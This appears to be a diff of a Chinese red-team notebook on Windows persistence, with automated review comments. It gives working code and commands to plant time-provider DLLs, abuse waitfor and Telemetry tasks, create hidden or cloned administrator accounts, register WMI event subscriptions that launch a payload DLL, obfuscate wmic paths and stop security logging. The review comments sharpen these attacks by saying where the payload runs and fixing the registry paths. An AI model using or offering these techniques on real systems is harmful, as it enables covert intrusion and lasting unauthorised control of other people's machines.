UNREFERENCED_PARAMETER(nCmdShow);
OutputDebugStringW(L"Register\n");
/*
* Time providers manually register with the Win32 Time Service
* See https://msdn.microsoft.com/en-us/library/windows/desktop/ms724869(v=vs.85).aspx
*
* Begin by creating the key for the provider
*/
nRet = RegCreateKeyExW(HKEY_LOCAL_MACHINE,
GAMETIME_SVC_KEY_NAME,
0,
NULL,
0,
KEY_ALL_ACCESS,
NULL,
&hkTimeProvider,
NULL);
if (ERROR_SUCCESS != nRet)
{
OutputError(L"RegCreateKeyExW failed", nRet);
goto ErrorExit;
}
/*
* Populate the three required time provider configuration values
* The three required values are: DllName, Enabled, InputProvider
*/
nRet = RegSetValueExW(hkTimeProvider,
L"DllName",
0,
REG_SZ,
(LPBYTE)g_wzModule,
(DWORD)wcslen(g_wzModule)*sizeof(WCHAR)+sizeof(WCHAR));
if (ERROR_SUCCESS != nRet)
{
OutputError(L"RegCreateKeyExW failed", nRet);
goto ErrorExit;
}
nRet = RegSetValueExW(hkTimeProvider,
L"Enabled",
0,
REG_DWORD,
(LPBYTE)&dwOne,
sizeof(dwOne));
if (ERROR_SUCCESS != nRet)
{
OutputError(L"RegCreateKeyExW failed", nRet);
goto ErrorExit;
}
nRet = RegSetValueExW(hkTimeProvider,
L"InputProvider",
0,
REG_DWORD,
(LPBYTE)&dwOne,
sizeof(dwOne));
if (ERROR_SUCCESS != nRet)
{
OutputError(L"RegCreateKeyExW failed", nRet);
goto ErrorExit;
}
ErrorExit:
if (NULL != hkTimeProvider)
{
(void)RegCloseKey(hkTimeProvider);
}
return;
}
void CALLBACK Deregister(
_In_ HWND hWnd,
_In_ HINSTANCE hInst,
_In_ LPSTR pwzCmdLine,
_In_ int nCmdShow)
{
long nRet;
UNREFERENCED_PARAMETER(hWnd);
UNREFERENCED_PARAMETER(hInst);
UNREFERENCED_PARAMETER(pwzCmdLine);
UNREFERENCED_PARAMETER(nCmdShow);
OutputDebugStringW(L"Unregister\n");
nRet = RegDeleteKeyW(HKEY_LOCAL_MACHINE, GAMETIME_SVC_KEY_NAME);
if (ERROR_SUCCESS != nRet)
{
OutputError(L"RegDeleteKeyW failed!", nRet);
goto ErrorExit;
}
ErrorExit:
return;
}
```
参考文章:
{% embed url="https://docs.microsoft.com/en-gb/windows/win32/sysinfo/time-provider" caption="" %}
{% embed url="https://github.com/scottlundgren/w32time" caption="" %}
{% embed url="https://pentestlab.blog/2019/10/22/persistence-time-providers/" caption="" %}
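Review bot: two corrections and one missing explanation. The `reg add ... \TimeProviders\NtpClient /v DllName ...` and `NtpServer` lines replace the built-in provider's DLL, so time synchronisation stops and the service logs provider errors at every start; the custom-provider route below avoids that and is the one to recommend. In `Register`, the three `RegSetValueExW` failure paths all log `OutputError(L"RegCreateKeyExW failed", nRet);`, which misattributes the error; change each message. Finally the hunk never says how the DLL is wired in: `TimeProvOpen`, `TimeProvCommand` and `TimeProvClose` must be exported (a `.def` file or `__declspec(dllexport)`), `Register` is meant to be invoked as `rundll32 gametime.dll,Register` from an elevated prompt, and because `TimeProvOpen` returns `ERROR_NOT_CAPABLE` the service unloads the provider immediately, so the only code that ever runs is `DllMain` at `DLL_PROCESS_ATTACH` inside the w32time svchost (LocalService on workstations); that is where a payload goes, and it should be stated.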

View File

@ -0,0 +1,19 @@
# Waitfor
是存在于Windows上用来同步网络中计算机可以发送或等待系统上的信号的程序默认位置在“C:\Windows\System32\waitfor.exe”
```text
#Target computer
waitfor persist && C:\Temp\qwqdanchun.exe
#Use this to trigger
waitfor /s 127.0.0.1 /si persist
```
参考文章:
{% embed url="https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc731613\(v=ws.11\)?redirectedfrom=MSDN" caption="" %}
{% embed url="https://github.com/3gstudent/Waitfor-Persistence" caption="" %}
{% embed url="https://twitter.com/danielhbohannon/status/872258924078092288" caption="" %}
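Review bot: `waitfor persist && C:\Temp\qwqdanchun.exe` is not persistence on its own; it is a foreground process that blocks until the signal arrives, dies with its console and does not survive a reboot, so it has to be started from one of the autostart locations elsewhere on this page (or at least with `start /b`), and the hunk should say so. The trigger `waitfor /s 127.0.0.1 /si persist` is shown against localhost; a remote trigger needs an account valid on the target and the signal travels as a mailslot message over SMB or a subnet broadcast, which is the detection point. Also, `waitfor` returns after one signal, so the `&&` runs the payload exactly once.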


@ -0,0 +1,20 @@
# Windows Telemetry
在Windows 7之后的Windows操作系统都存在这一个监测数据收集服务如果加入了Microsoft用户反馈改善计划该服务就会监测系统异常并收集反馈到微软。
命令行:
```text
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\AppCompatFlags\TelemetryController\qwqdanchun"
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\AppCompatFlags\TelemetryController\qwqdanchun" /v Command /t REG_SZ /d "C:\Temp\qwqdanchun.exe" /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\AppCompatFlags\TelemetryController\qwqdanchun" /v Nightly /t REG_DWORD /d 1 /f
```
原理:
{% embed url="https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/" caption="" %}
利用代码:
{% embed url="https://github.com/360-Linton-Lab/Telemetry" caption="" %}
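Review bot: all three `REG ADD` lines use `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\AppCompatFlags\TelemetryController\qwqdanchun`, and `WindowsNT` must be `Windows NT` (with the space); as written they create an unrelated key that nothing reads. The first line also lacks `/f`, harmless for a new key but inconsistent. From the linked TrustedSec article it is worth adding that `Command` is executed by `CompatTelRunner.exe` as SYSTEM when the `Microsoft Compatibility Appraiser` scheduled task fires and that `Nightly` = 1 is what puts it in that daily run, so the cadence is once a day, not at logon.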


@ -0,0 +1,2 @@
# 用户账户


@ -0,0 +1,176 @@
# 新建用户
新建用户并添加管理员及远程访问权限
命令行:
```text
net user qwqdanchun password /add /y
net localgroup administrators qwqdanchun /add
net localgroup "remote desktop users" qwqdanchun /add
```
Powershell
```text
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","qwqdanchun")
od.SetPassword "password"
od.SetInfo
Set of=GetObject(os&"/admin",user)
oe.add os&"/admin"
```
Powershell另一个版本
```text
$Username = "qwqdanchun"
$P = "password"
$Password = ConvertTo-SecureString $P -AsPlainText -Force
New-LocalUser $Username -Password $Password -FullName "test account" -Description "test user."
Add-LocalGroupMember -Group "administrators" -Member "qwqdanchun"
```
c\#(使用系统 API 函数):
```csharp
using System;
using System.Runtime.InteropServices;
namespace Bypass360Add
{
public static class BypassUAC_csharp
{
[DllImport("kernel32.dll")]
static extern void ExitProcess(uint uExitCode);
public static void Main(string[] args)
{
LocalGroupUserHelper local = new LocalGroupUserHelper();
string username = "qwqdanchun";
string password = "password";
string groupname = "Administrators";
local.AddUser(null, username, password, null);
local.GroupAddMembers(null, groupname, username);
ExitProcess(1);
}
}
public class LocalGroupUserHelper
{
[DllImport("Netapi32.dll")]
extern static int NetUserAdd([MarshalAs(UnmanagedType.LPWStr)] string servername, int level, ref USER_INFO_1 buf, int parm_err);
[DllImport("Netapi32.dll")]
extern static int NetLocalGroupAddMembers([MarshalAs(UnmanagedType.LPWStr)] string servername, [MarshalAs(UnmanagedType.LPWStr)] string groupname,
int level, ref LOCALGROUP_MEMBERS_INFO_3 buf, int totalentries);
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct LOCALGROUP_MEMBERS_INFO_3
{
public string domainandname; // //lgrmi3_domainandname
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct USER_INFO_1
{
public string usri1_name;
public string usri1_password;
public int usri1_password_age;
public int usri1_priv;
public string usri1_home_dir;
public string comment;
public int usri1_flags;
public string usri1_script_path;
}
public void AddUser(string serverName, string userName, string password, string strComment)
{
USER_INFO_1 NewUser = new USER_INFO_1(); //创建一个USER_INFO_1实例
NewUser.usri1_name = userName; // Allocates the username
NewUser.usri1_password = password; // allocates the password
NewUser.usri1_priv = 1; // Sets the account type to USER_PRIV_USER
NewUser.usri1_home_dir = null; // We didn't supply a Home Directory
NewUser.comment = strComment; // Comment on the User
NewUser.usri1_script_path = null; // We didn't supply a Logon Script Path
if (NetUserAdd(serverName, 1, ref NewUser, 0) != 0) //添加失败后返回非0
{
Console.WriteLine("Error Adding User");
}
}
public void GroupAddMembers(string serverName, string groupName, string userName)
{
LOCALGROUP_MEMBERS_INFO_3 NewMember = new LOCALGROUP_MEMBERS_INFO_3();
NewMember.domainandname = userName;
if (NetLocalGroupAddMembers(serverName, groupName, 3, ref NewMember, 1) != 0) //添加失败后返回非0
{
Console.WriteLine("Error Adding Group Member");
}
}
}
}
```
c++\(重写AddUser\)
```cpp
#include "ApiAddUser.h"
int wmain(int argc, wchar_t* argv[])
{
UNICODE_STRING UserName;
UNICODE_STRING PassWord;
HANDLE ServerHandle = NULL;
HANDLE DomainHandle = NULL;
HANDLE UserHandle = NULL;
ULONG GrantedAccess;
ULONG RelativeId;
NTSTATUS Status = NULL;
HMODULE hSamlib = NULL;
HMODULE hNtdll = NULL;
HMODULE hNetapi32 = NULL;
LSA_HANDLE hPolicy = NULL;
LSA_OBJECT_ATTRIBUTES ObjectAttributes = { 0 };
PPOLICY_ACCOUNT_DOMAIN_INFO DomainInfo = NULL;
USER_ALL_INFORMATION uai = { 0 };
hSamlib = LoadLibraryA("samlib.dll");
hNtdll = LoadLibraryA("ntdll");
pSamConnect SamConnect = (pSamConnect)GetProcAddress(hSamlib, "SamConnect");
pSamOpenDomain SamOpenDomain = (pSamOpenDomain)GetProcAddress(hSamlib, "SamOpenDomain");
pSamCreateUser2InDomain SamCreateUser2InDomain = (pSamCreateUser2InDomain)GetProcAddress(hSamlib, "SamCreateUser2InDomain");
pSamSetInformationUser SamSetInformationUser = (pSamSetInformationUser)GetProcAddress(hSamlib, "SamSetInformationUser");
pSamQuerySecurityObject SamQuerySecurityObject = (pSamQuerySecurityObject)GetProcAddress(hSamlib, "SamQuerySecurityObject");
pRtlInitUnicodeString RtlInitUnicodeString = (pRtlInitUnicodeString)GetProcAddress(hNtdll, "RtlInitUnicodeString");
RtlInitUnicodeString(&UserName, L"Admin");
RtlInitUnicodeString(&PassWord, L"Admin");
Status = SamConnect(NULL, &ServerHandle, SAM_SERVER_CONNECT | SAM_SERVER_LOOKUP_DOMAIN, NULL);;
Status = LsaOpenPolicy(NULL,&ObjectAttributes,POLICY_VIEW_LOCAL_INFORMATION,&hPolicy);
Status = LsaQueryInformationPolicy(hPolicy, PolicyAccountDomainInformation, (PVOID*)&DomainInfo);
Status = SamOpenDomain(ServerHandle,
DOMAIN_CREATE_USER | DOMAIN_LOOKUP | DOMAIN_READ_PASSWORD_PARAMETERS,
DomainInfo->DomainSid,
&DomainHandle);
Status = SamCreateUser2InDomain(DomainHandle,
&UserName,
USER_NORMAL_ACCOUNT,
USER_ALL_ACCESS | DELETE | WRITE_DAC,
&UserHandle,&GrantedAccess,&RelativeId);
RtlInitUnicodeString(&uai.NtPassword, PassWord.Buffer);
uai.NtPasswordPresent = TRUE;
uai.WhichFields |= USER_ALL_NTPASSWORDPRESENT;
Status = SamSetInformationUser(UserHandle,
UserAllInformation,
&uai);
return 0;
}
```
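Review bot: the block labelled `Powershell` (from `set wsnetwork=CreateObject("WSCRIPT.NETWORK")` to `oe.add os&"/admin"`) is VBScript, not PowerShell, so relabel it and tag the fence `vbscript` instead of `text`; the heading `c\#(使用系统 API 函数):` is an over-escaped `C#`. In the C# class, `ExitProcess(1)` makes the program report failure even when both calls succeed, and the `USER_INFO_1.comment` field breaks the `usri1_` naming used by every other field (the layout is positional so it still works, but it hides which API field it maps to). In the C++ block, `#include "ApiAddUser.h"`, which has to define the `pSam*` function typedefs, is not part of this commit; none of the `Status` results is checked before `DomainInfo->DomainSid` is dereferenced; there is a stray `;;` after the `SamConnect` call; and `L"Admin"`/`L"Admin"` depart from the README's `qwqdanchun` naming convention.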


@ -0,0 +1,158 @@
# 隐藏用户
原理:
1.用户名要以$结尾输入net user无法获取
2.删除自身账户,再导入克隆的账户注册表,使注册表存在但是查不到账户
Powershell:
```text
function Create-Clone
{
<#
.SYNOPSIS
This script requires Administrator privileges. use Invoke-TokenManipulation.ps1 to get system privileges and create the clone user.
.PARAMETER u
The clone username
.PARAMETER p
The clone user password
.PARAMETER cu
The user to clone, default administrator
.EXAMPLE
Create-Clone -u evi1cg -p evi1cg123 -cu administrator
#>
Param(
[Parameter(Mandatory=$true)]
[String]
$u,
[Parameter(Mandatory=$true)]
[String]
$p,
[Parameter(Mandatory=$false)]
[String]
$cu = "administrator"
)
function upReg{
"HKEY_LOCAL_MACHINE\SAM [1 17]" | Out-File $env:temp\up.ini
"HKEY_LOCAL_MACHINE\SAM\SAM [1 17]"| Out-File -Append $env:temp\up.ini
"HKEY_LOCAL_MACHINE\SAM\SAM\Domains [1 17]" | Out-File -Append $env:temp\up.ini
"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [1 17] "| Out-File -Append $env:temp\up.ini
"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [1 17] "| Out-File -Append $env:temp\up.ini
"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [1 17]"| Out-File -Append $env:temp\up.ini
cmd /c "regini $env:temp\up.ini"
Remove-Item $env:temp\up.ini
}
function downreg {
"HKEY_LOCAL_MACHINE\SAM [1 17]" | Out-File $env:temp\down.ini
"HKEY_LOCAL_MACHINE\SAM\SAM [17]"| Out-File -Append $env:temp\down.ini
"HKEY_LOCAL_MACHINE\SAM\SAM\Domains [17]" | Out-File -Append $env:temp\down.ini
"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [17] "| Out-File -Append $env:temp\down.ini
"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [17] "| Out-File -Append $env:temp\down.ini
"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [17]"| Out-File -Append $env:temp\down.ini
cmd /c "regini $env:temp\down.ini"
Remove-Item $env:temp\down.ini
}
function Create-user ([string]$Username,[string]$Password) {
$group = "Administrators"
$existing = Test-Path -path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$Username"
if (!$existing) {
Write-Host "[*] Creating new local user $Username with password $Password"
& NET USER $Username $Password /add /y /expires:never | Out-Null
Write-Host "[*] Adding local user $Username to $group."
& NET LOCALGROUP $group $Username /add | Out-Null
}
else {
Write-Host "[*] Adding existing user $Username to $group."
& NET LOCALGROUP $group $Username /add | Out-Null
$adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
$exist = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $Username }
Write-Host "[*] Setting password for existing local user $Username"
$exist.SetPassword($Password)
}
Write-Host "[*] Ensuring password for $Username never expires."
& WMIC USERACCOUNT WHERE "Name='$Username'" SET PasswordExpires=FALSE | Out-Null
}
function GetUser-Key([string]$user)
{
cmd /c " echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\$user [1 17] >> $env:temp\$user.ini"
cmd /c "regini $env:temp\$user.ini"
Remove-Item $env:temp\$user.ini
if(Test-Path -Path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$user"){
cmd /c "regedit /e $env:temp\$user.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\$user""
$file = Get-Content "$env:temp\$user.reg" | Out-String
$pattern="@=hex\((.*?)\)\:"
$file -match $pattern |Out-Null
$key = "00000"+$matches[1]
Write-Host "[!]"$key
return $key
}else {
Write-Host "[-] SomeThing Wrong !"
}
}
function Clone ([string]$ukey,[string]$cukey) {
"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\$ukey [1 17] "| Out-File $env:temp\f.ini
"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\$cukey [1 17] " | Out-File $env:temp\f.ini
cmd /c " regini $env:temp\f.ini"
Remove-Item $env:temp\f.ini
$ureg = "HKLM:\SAM\SAM\Domains\Account\Users\$ukey" |Out-String
$cureg = "HKLM:\SAM\SAM\Domains\Account\Users\$cukey" |Out-String
Write-Host "[*] Get clone user'F value"
$cuFreg = Get-Item -Path $cureg.Trim()
$cuFvalue = $cuFreg.GetValue('F')
Write-Host "[*] Change user'F value"
Set-ItemProperty -path $ureg.Trim() -Name "F" -value $cuFvalue
$outreg = "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\$ukey"
cmd /c "regedit /e $env:temp\out.reg $outreg.Trim()"
}
function Main () {
if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator"))
{
Write-Output "Script must be run as administrator"
break
}
Write-Output "[*] Start"
Write-Output "[*] Tring to change reg privilege !"
upReg
if( !(Test-Path -path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$cu")){
Write-Host "[-] The User to Clone does not exist !"
Write-Output "[*] Change reg privilege back !"
downReg
Write-Output "[*] Exiting !"
}
else {
if(!(Test-Path -path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$u")){
$tmp = "1"
}
else{
$tmp = "0"
}
Write-Output "[*] Create User..."
Create-user $u $p
Write-Output "[*] Get User $u's Key .."
$ukey = GetUser-Key $u |Out-String
Write-Output "[*] Get User $cu's Key .."
$cukey = GetUser-Key $cu |Out-String
Write-Output "[*] Clone User.."
Clone $ukey $cukey
if($tmp -eq 1 ){
Write-Output "[*] Delete User.."
cmd /c "net User $u /del " |Out-Null
}else{ Write-Output "[*] Don't need to delete.."}
cmd /c "regedit /s $env:temp\$u.reg"
cmd /c "regedit /s $env:temp\out.reg"
Remove-Item $env:temp\*.reg
Write-Output "[*] Change reg privilege back !"
downreg
Write-Output "[*] Done"
}
}
Main
}
```
参考文章:
{% embed url="https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E7%B3%BB%E7%BB%9F%E7%9A%84%E5%B8%90%E6%88%B7%E9%9A%90%E8%97%8F/" caption="" %}
{% embed url="https://github.com/Ridter/Pentest/blob/master/powershell/MyShell/Create-Clone.ps1" caption="" %}
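Review bot: item 1 of 原理 overstates the effect: a trailing `$` only hides the account from `net user` output, and the script itself still locates the account through `Test-Path -path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$Username"` in both `Create-user` and `Main`, so the page should say the SAM `Names` subkey is where such an account remains visible. Two smaller points: `Remove-Item $env:temp\*.reg` in `Main` deletes every `.reg` file in the temp folder rather than only the files the script wrote, and `"[*] Tring to change reg privilege !"` has a typo. Also format the two 原理 items as a markdown numbered list (blank line before `1.`), otherwise GitBook renders them as one run-on paragraph.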


@ -0,0 +1,2 @@
# WMI


@ -0,0 +1,109 @@
# WMI事件
## WMI事件 <a id="h1-wmi-"></a>
WMI事件是特定对象的属性发生改变时发出的通知其中包括增加、修改、删除三种类型。可以使用wmic命令来修改。
## 利用代码 <a id="h1-u5229u7528u4EE3u7801"></a>
命令行:
```text
#注册一个事件过滤器该过滤器是开机2分钟到2分半钟由于是永久WMI事件订阅故需要管理员权限最终获取到权限也是system权限
wmic /NAMESPACE:"\\root\subscription"PATH__EventFilterCREATE Name="TestEventFilter", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 20 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >=120 AND TargetInstance.SystemUpTime < 150"
#注册一个事件消费者,这里写入了要执行的命令,是用 rundll32 启动 cs 的 dll
wmic /NAMESPACE:"\\root\subscription"PATHCommandLineEventConsumer CREATE Name="TestConsumer2",ExecutablePath="C:\Windows\System32\cmd.exe",CommandLineTemplate=" /c rundll32 c:\Temp\qwqdanchun.dll"
#绑定事件 过滤器和事件消费者
wmic /NAMESPACE:"\\root\subscription"PATH__FilterToConsumerBindingCREATE Filter="__EventFilter.Name=\"TestEventFilter\"", Consumer="CommandLineEventConsumer.Name=\"TestConsumer2\""
```
Powershell
```text
$wmiParams = @{
NameSpace = 'root\subscription'
}
# Creating a new event filter
$wmiParams.Class = '__EventFilter'
$wmiParams.Arguments = @{
Name = 'BugSecFilter'
EventNamespace = 'root\CIMV2'
QueryLanguage = 'WQL'
Query = "select * from __InstanceCreationEvent within 5 where targetInstance isa 'Win32_Process' and TargetInstance.Name = 'chrome.exe'"
}
$filterResult = Set-WmiInstance @wmiParams
# Creating a new consumer
$wmiParams.Class = 'CommandLineEventConsumer'
$wmiParams.Arguments = @{
Name = 'BugSecConsumer'
CommandLineTemplate = "cmd.exe /c rundll32 c:\Temp\qwqdanchun.dll"
}
$consumerResult = Set-WmiInstance @wmiParams
# Bind filter to consumer
$wmiParams.Class = '__FilterToConsumerBinding'
$wmiParams.Arguments = @{
Filter = $filterResult
Consumer = $consumerResult
}
Set-WmiInstance @wmiParams
```
C\#:
```csharp
using System;
using System.Text;
using System.Management;
namespace WMIPersistence
{
class Program
{
static void Main(string[] args)
{
PersistWMI();
}
static void PersistWMI()
{
ManagementObject myEventFilter = null;
ManagementObject myEventConsumer = null;
ManagementObject myBinder = null;
String CommandLine = @"cmd.exe /c rundll32 c:\Temp\qwqdanchun.dll";
String strQuery = @"SELECT * FROM __InstanceCreationEvent WITHIN 5 " +
"WHERE TargetInstance ISA \"Win32_Process\" " +
"AND TargetInstance.Name = \"chrome.exe\"";
try
{
ManagementScope scope = new ManagementScope(@"\\.\root\subscription");
ManagementClass wmiEventFilter = new ManagementClass(scope, new ManagementPath("__EventFilter"), null);
WqlEventQuery myEventQuery = new WqlEventQuery(strQuery);
myEventFilter = wmiEventFilter.CreateInstance();
myEventFilter["Name"] = "BugSecFilter";
myEventFilter["Query"] = myEventQuery.QueryString;
myEventFilter["QueryLanguage"] = myEventQuery.QueryLanguage;
myEventFilter["EventNameSpace"] = @"\root\cimv2";
myEventFilter.Put();
myEventConsumer = new ManagementClass(scope, new ManagementPath("CommandLineEventConsumer"), null).CreateInstance();
myEventConsumer["Name"] = "BugSecConsumer";
myEventConsumer["CommandLineTemplate"] = CommandLine;
myEventConsumer.Put();
myBinder = new ManagementClass(scope, new ManagementPath("__FilterToConsumerBinding"), null).CreateInstance();
myBinder["Filter"] = myEventFilter.Path.RelativePath;
myBinder["Consumer"] = myEventConsumer.Path.RelativePath;
myBinder.Put();
}
catch (Exception e)
{
Console.WriteLine(e);
}
Console.ReadKey();
}
}
}
```
参考文章:
{% embed url="https://github.com/AxelPotato/WMI" caption="" %}
{% embed url="https://docs.microsoft.com/zh-cn/windows-hardware/drivers/kernel/introduction-to-wmi" caption="" %}
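Review bot: the three `wmic` lines have lost their separators, e.g. `PATH__EventFilterCREATE` and `PATHCommandLineEventConsumer`, so they do not parse as shown, and the `#` lines are not comments in `cmd`, which would try to execute them; use `REM` or move the explanations above the fence. Keep the namespace spelling consistent across the three variants: the C# sets `myEventFilter["EventNameSpace"] = @"\root\cimv2"` with a leading backslash while the wmic and PowerShell versions use `root\cimv2`, and the C# `Console.ReadKey()` leaves the process waiting for a key press. Lastly, the second reference (`windows-hardware/drivers/kernel/introduction-to-wmi`) documents WMI for kernel-mode drivers, not permanent event subscriptions; the `__EventFilter`, `CommandLineEventConsumer` and `__FilterToConsumerBinding` class pages are the relevant Microsoft docs.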


@ -0,0 +1,2 @@
# 漏洞


@ -0,0 +1,2 @@
# UAC Bypass


@ -0,0 +1,2 @@
# 错误配置


@ -0,0 +1,12 @@
# 启动进程
WMI:
```text
wmic process call create "\\?\UNC\127.0.0.1\C$\windows\system32\calc.exe"
wmic process call create "\\.\GLOBALROOT\??\UNC\127.0.0.1\C$\windows\system32\calc.exe"
wmic process call create "\\;lanmanredirector\127.0.0.1\C$\windows\system32\calc.exe"
wmic process call create "\\.\globalroot\osdataroot\windows\notepad.exe"
wmic process call create "\\.\global\globalroot\device\mup\;lanmanredirector\.\localhost\c$\\windows\:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data nul..\ /..\..\write.exe"
```
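Review bot: this page lists five `wmic process call create` path variants with no explanation of what they illustrate (each is an alternative spelling of a local executable path via UNC loopback, `GLOBALROOT`, `lanmanredirector` or the MUP device) and no source; the other pages in this commit carry a 原理 paragraph and `{% embed %}` references, so add the same here so a reader knows which path forms are being normalized and which reference to check.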

14
rats/hidden-remote.md Normal file

@ -0,0 +1,14 @@
# Hidden Remote
HVNC:
{% embed url="https://bbs.pediy.com/thread-264956.htm" caption="" %}
HRDP:
{% embed url="https://bbs.pediy.com/thread-265188.htm" caption="" %}
Remote Desktop Shadowing:
{% embed url="https://bitsadm.in/blog/spying-on-users-using-rdp-shadowing" caption="" %}

2
rats/stealer/README.md Normal file

@ -0,0 +1,2 @@
# Stealer


@ -0,0 +1,6 @@
# 输入法
参考链接:
{% embed url="https://www.cnki.com.cn/Article/CJFDTotal-JCJS202005014.htm" caption="" %}

14
tips/some-tips.md Normal file

@ -0,0 +1,14 @@
# 鬼知道有什么用的小知识
Win+Ctrl+Shift+B 重启图形驱动
ShellBrowserWindow创建的进程被any.run标记为用户手动执行
64位系统上的32位杀软有可能扫描不到c:\windows\sysnative下的文件
添加CurrentControlSet\Control\MiniNtwin会认为自己是pe系统并不再记录安全日志
Win+R 输入”.exe://“ 会重启explorer
echo qwqdanchun&gt;C:\SYSTEM~1\ClientRecoveryPasswordRotation\test.txt\([https://twitter.com/jonasLyk/status/1368259706423230464?s=20](https://twitter.com/jonasLyk/status/1368259706423230464?s=20)\)
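Review bot: `echo qwqdanchun&gt;C:\SYSTEM~1\...` contains an HTML entity where `>` is meant. The trailing `\([https://twitter.com/...](https://twitter.com/...)\)` has escaped parentheses and repeats the URL as link text; the other pages use `{% embed url="..." %}` for references, so either that or a plain URL. The tips are also written as consecutive lines with no list markers, so GitBook will merge them into one paragraph; put each tip on its own `*` bullet.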

2
tools/untitled.md Normal file

@ -0,0 +1,2 @@
# Untitled